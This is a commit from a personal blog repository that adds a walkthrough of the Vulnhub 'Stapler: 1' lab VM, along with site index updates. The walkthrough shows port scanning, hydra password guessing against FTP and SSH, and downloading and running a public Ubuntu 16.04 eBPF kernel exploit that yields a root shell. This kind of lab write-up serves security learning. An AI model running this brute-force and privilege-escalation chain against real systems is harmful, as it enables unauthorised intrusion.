pew
/
paulwalko.github.io
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

stapler: 1

master
Paul Walko 2016-06-19 18:14:01 -04:00
parent 55a8e2b3ed
commit 8a852e04fe
12 changed files with 933 additions and 340 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

291
_posts/2016-06-19-stapler_walkthough.md Normal file
View File

@ -0,0 +1,291 @@
---
title: "Stapler: 1 Vulnhub Walkthrough"
layout: post
category: writeup
tags: [vulnhub, hacking]
excerpt: "Walkthrough for Stapler: 1 VM on Vulnhub"
---
# Figure out the IP
```
paul@archyoga [05:31:55] [~]
-> % nmap -sn 192.168.1.0/24
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
.
.
.
Nmap scan report for red (192.168.1.135)
Host is up (0.0030s latency).
.
.
.
Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds
```
Let's see what's there:
```
paul@archyoga [05:33:59] [~]
-> % nmap -Pn 192.168.1.135
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
Nmap scan report for red (192.168.1.135)
Host is up (0.011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
```
# Login to ftp
```
paul@archyoga [05:34:57] [~]
-> % ftp
ftp> open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
226 Directory send OK.
ftp> get note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
ftp> 221 Goodbye.
paul@archyoga [05:36:17] [~]
-> % cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
```
Turns out it is, and inside is a file named ```note``` which names an ftp user: ```elly```.
I used hydra to test some common passwords and that worked out:
```
paul@archyoga [05:39:21] [~]
-> % hydra -l elly -e nsr 92.168.1.135 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.135 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50
```
Now we can login to ftp as elly using the password ```ylle```. On the ftp server there's a passwd file, so I can use that as a user list to test against:
```
paul@archyoga [05:42:07] [~]
-> % ftp
ftp> open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
.
.
.
-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd
.
.
.
ftp> get passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
ftp> 221 Goodbye.
```
# Login over ssh & exploit
Using hydra again I discovered a login for ssh from the passwd file:
```
paul@archyoga [05:42:36] [~]
-> % awk -F':' '{ print $1}' passwd > users
-> % hydra -e nsr -L ./users 192.168.1.135 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett
```
Then once I determined the release I went over to [http://exploit-db.com](http://exploit-db.com) and searched "ubuntu 16.04" and found this: https://www.exploit-db.com/exploits/39772/
Now for the exploit:
```
paul@archyoga [05:50:44] [~]
-> % ssh SHayslett@192.168.1.135
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.1.135's password:
Welcome back!
SHayslett@red:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.252.130
Connecting to github.com (github.com)|192.30.252.130|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: 39772.zip
39772.zip 100%[=====================================================================================================================================================================================================>] 6.95K --.-KB/s in 0s
2016-06-19 18:49:37 (94.2 MB/s) - 39772.zip saved [7115/7115]
SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
Resolving github.com (github.com)... 192.30.252.128
Connecting to github.com (github.com)|192.30.252.128|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: 39772.zip
39772.zip 100%[=======================
2016-06-19 18:52:05 (4.75 MB/s) - 39772.zip saved [7115/7115]
SHayslett@red:~/tmp$ unzip *
Archive: 39772.zip
creating: 39772/
.
.
.
SHayslett@red:~/tmp$ cd *2
SHayslett@red:~/tmp/39772$ ls
crasher.tar exploit.tar
SHayslett@red:~/tmp/39772$ tar xf exploit.tar
SHayslett@red:~/tmp/39772$ ls
crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function make_setuid:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function make_setuid:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#
```
This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/.
Next, the flag!
```
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
root@red:/root# cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
```
Woo!

31
_site/category/index.html
View File

@ -122,7 +122,7 @@
<li class="current" data-show="writeup"> <li class="current" data-show="writeup">
<a href="javascript:void(0)"> <a href="javascript:void(0)">
writeup writeup
<span class="cateCnt">1</span> <span class="cateCnt">2</span>
</a> </a>
</li> </li>
@ -152,6 +152,35 @@
<article class="row">
<div class="date col-lg-2 col-md-2 col-sm-2">
<p class="day">19</p>
<p class="month">Jun/2016</p>
<p class="category">writeup</p>
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/stapler_walkthough">Stapler: 1 Vulnhub Walkthrough</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> vulnhub</i></li>
<li><i class="fa fa-tag"> hacking</i></li>
</ul>
<br>
<hr class="clearfix">
<p class="excerpt">
Walkthrough for Stapler: 1 VM on Vulnhub
</p>
</div>
<button class="continue"><a href="/writeup/stapler_walkthough">FULL ARTICLE</a></button>
</article>
<article class="row"> <article class="row">
<div class="date col-lg-2 col-md-2 col-sm-2"> <div class="date col-lg-2 col-md-2 col-sm-2">
<p class="day">14</p> <p class="day">14</p>

26
_site/index.html
View File

@ -120,6 +120,32 @@
<article class="row">
<div class="date col-lg-2 col-md-2 col-sm-2">
<p class="day">19</p>
<p class="month">Jun/2016</p>
<p class="category">writeup</p>
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/stapler_walkthough">Stapler: 1 Vulnhub Walkthrough</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> vulnhub</i></li>
<li><i class="fa fa-tag"> hacking</i></li>
</ul>
<br>
<hr class="clearfix">
<p class="excerpt">
Walkthrough for Stapler: 1 VM on Vulnhub
</p>
</div>
<button class="continue"><a href="/writeup/stapler_walkthough">FULL ARTICLE</a></button>
</article>
<article class="row"> <article class="row">
<div class="date col-lg-2 col-md-2 col-sm-2"> <div class="date col-lg-2 col-md-2 col-sm-2">
<p class="day">14</p> <p class="day">14</p>

1
_site/sitemap.txt
View File

@ -1,3 +1,4 @@
http://paul.walko.org//writeup/stapler_walkthough
http://paul.walko.org//writeup/nebula_exploit_exercises http://paul.walko.org//writeup/nebula_exploit_exercises

8
_site/sitemap.xml
View File

@ -4,9 +4,15 @@
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd"> http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<url>
<loc>http://paul.walko.org//writeup/stapler_walkthough</loc>
<lastmod>2016-06-19T18:13:08-04:00</lastmod>
<changefreq>weekly</changefreq>
</url>
<url> <url>
<loc>http://paul.walko.org//writeup/nebula_exploit_exercises</loc> <loc>http://paul.walko.org//writeup/nebula_exploit_exercises</loc>
<lastmod>2016-06-19T02:35:49-04:00</lastmod> <lastmod>2016-06-19T18:13:08-04:00</lastmod>
<changefreq>weekly</changefreq> <changefreq>weekly</changefreq>
</url> </url>

1
_site/stapler_walkthough.html Normal file
View File

@ -0,0 +1 @@

1
_site/stylesheets/base.css
View File

@ -211,6 +211,7 @@ pre,
samp { samp {
font-family: monospace, monospace; font-family: monospace, monospace;
font-size: 1em; font-size: 1em;
background-color:rgba(192,192,192,0.6);
} }
/* Forms /* Forms

100
_site/tag/index.html
View File

@ -141,6 +141,15 @@
<a href="javascript:void(0)"> <a href="javascript:void(0)">
<i class="fa fa-tag"></i> <i class="fa fa-tag"></i>
hacking hacking
<span class="tagCnt">2</span>
</a>
</li>
<li data-show="vulnhub">
<a href="javascript:void(0)">
<i class="fa fa-tag"></i>
vulnhub
<span class="tagCnt">1</span> <span class="tagCnt">1</span>
</a> </a>
</li> </li>
@ -303,6 +312,35 @@
<article class="row">
<div class="date col-lg-2 col-md-2 col-sm-2">
<p class="day">19</p>
<p class="month">Jun/2016</p>
<p class="category">writeup</p>
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/stapler_walkthough">Stapler: 1 Vulnhub Walkthrough</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> vulnhub</i></li>
<li><i class="fa fa-tag"> hacking</i></li>
</ul>
<br>
<hr class="clearfix">
<p class="excerpt">
Walkthrough for Stapler: 1 VM on Vulnhub
</p>
</div>
<button class="continue"><a href="/writeup/stapler_walkthough">FULL ARTICLE</a></button>
</article>
<article class="row"> <article class="row">
<div class="date col-lg-2 col-md-2 col-sm-2"> <div class="date col-lg-2 col-md-2 col-sm-2">
<p class="day">14</p> <p class="day">14</p>
@ -336,6 +374,68 @@
<div class="row" id="paginator">
</div>
</section>
<section class="showcase col-lg-9 col-lg-offset-1 hide " data-show="vulnhub">
<article class="row">
<div class="date col-lg-2 col-md-2 col-sm-2">
<p class="day">19</p>
<p class="month">Jun/2016</p>
<p class="category">writeup</p>
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/stapler_walkthough">Stapler: 1 Vulnhub Walkthrough</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> vulnhub</i></li>
<li><i class="fa fa-tag"> hacking</i></li>
</ul>
<br>
<hr class="clearfix">
<p class="excerpt">
Walkthrough for Stapler: 1 VM on Vulnhub
</p>
</div>
<button class="continue"><a href="/writeup/stapler_walkthough">FULL ARTICLE</a></button>
</article>
<div class="row" id="paginator"> <div class="row" id="paginator">

155
_site/writeup/Http_headers_and_PHP_header()_function.html
View File

@ -1,155 +0,0 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="This is an excerpt; please ignore">
<title>Test post; Please Ignore</title>
<!-- favicon -->
<link rel="shortcut icon" href="http://localhost:4000/favicon.ico" type="image/icon">
<link rel="icon" href="http://localhost:4000/favicon.ico" type="image/icon">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POST</a>
<li><a href="http://localhost:4000/category">CATEGORY</a></li>
<li><a href="http://localhost:4000/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/building">PLAY GROUND</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Aunifreak.github.io+' + keyword;
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Test post; Please Ignore</p>
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i> exploit-exercises</li>
<li><i class="fa fa-tag"></i> nebula</li>
<li><i class="fa fa-tag"></i> hacking</li>
</ul>
<p id="postMeta">posted on 26 Sep 2015 under category <a href="http://localhost:4000/category/">writeup</a></p>
</header>
<p>Really through, ignore this post.</p>
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i> <a href="http://www.github.com/paulwalko"> &nbsp;&nbsp;http://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; build by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
<script type="text/javascript" src="http://localhost:4000/javascripts/markdownreader.js"></script>
</body>
</html>

475
_site/writeup/stapler_walkthough.html Normal file
View File

@ -0,0 +1,475 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<!--<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Stapler: 1 VM on Vulnhub">
<title>Stapler: 1 Vulnhub Walkthrough</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="http://localhost:4000/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<!--
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
-->
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POSTS</a>
<li><a href="http://localhost:4000/category">CATEGORY</a></li>
<li><a href="http://localhost:4000/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Stapler: 1 Vulnhub Walkthrough</p>
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i> vulnhub</li>
<li><i class="fa fa-tag"></i> hacking</li>
</ul>
<p id="postMeta">posted on 19 Jun 2016 under category <a href="http://localhost:4000/category/">writeup</a></p>
</header>
<h1 id="figure-out-the-ip">Figure out the IP</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:31:55] [~]
-&gt; % nmap -sn 192.168.1.0/24
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
.
.
.
Nmap scan report for red (192.168.1.135)
Host is up (0.0030s latency).
.
.
.
Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds
</code></pre>
</div>
<p>Lets see whats there:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:33:59] [~]
-&gt; % nmap -Pn 192.168.1.135
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
Nmap scan report for red (192.168.1.135)
Host is up (0.011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
</code></pre>
</div>
<h1 id="login-to-ftp">Login to ftp</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:34:57] [~]
-&gt; % ftp
ftp&gt; open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
226 Directory send OK.
ftp&gt; get note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
ftp&gt; 221 Goodbye.
paul@archyoga [05:36:17] [~]
-&gt; % cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
</code></pre>
</div>
<p>Turns out it is, and inside is a file named <code class="highlighter-rouge">note</code> which names an ftp user: <code class="highlighter-rouge">elly</code>.
I used hydra to test some common passwords and that worked out:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:39:21] [~]
-&gt; % hydra -l elly -e nsr 92.168.1.135 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.135 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50
</code></pre>
</div>
<p>Now we can login to ftp as elly using the password <code class="highlighter-rouge">ylle</code>. On the ftp server theres a passwd file, so I can use that as a user list to test against:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:42:07] [~]
-&gt; % ftp
ftp&gt; open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
.
.
.
-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd
.
.
.
ftp&gt; get passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
ftp&gt; 221 Goodbye.
</code></pre>
</div>
<h1 id="login-over-ssh--exploit">Login over ssh &amp; exploit</h1>
<p>Using hydra again I discovered a login for ssh from the passwd file:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:42:36] [~]
-&gt; % awk -F':' '{ print $1}' passwd &gt; users
-&gt; % hydra -e nsr -L ./users 192.168.1.135 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett
</code></pre>
</div>
<p>Then once I determined the release I went over to <a href="http://exploit-db.com">http://exploit-db.com</a> and searched “ubuntu 16.04” and found this: https://www.exploit-db.com/exploits/39772/</p>
<p>Now for the exploit:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:50:44] [~]
-&gt; % ssh SHayslett@192.168.1.135
